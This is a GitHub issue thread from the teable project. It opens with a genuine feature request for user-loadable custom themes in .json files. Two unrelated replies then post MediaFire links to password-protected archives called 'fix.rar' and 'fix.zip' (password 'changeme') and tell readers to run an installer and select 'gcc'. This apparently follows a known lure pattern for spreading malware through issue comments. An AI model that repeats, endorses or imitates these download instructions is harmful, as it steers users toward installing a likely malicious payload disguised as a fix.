### ISSUE TITLE
[Feature Request] Add custom themes

### ISSUE THREAD

**Issue by sillynocodecat** [teableio/teable#862]
Now white theme is perfect, but black is not so comfortable for long-time visits. It would be great to add function to customize your own theme.

I think there's no need to create a big no-code parametres to customize, it would be great to load theme from .json file with parametres or smth. 

I understand that your idea is bring "wysiwyg" edit for tables but with grow community I think we will see custom themes by other. And people, who can't code, will be able just to upload other .json file and see new comfort theme.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
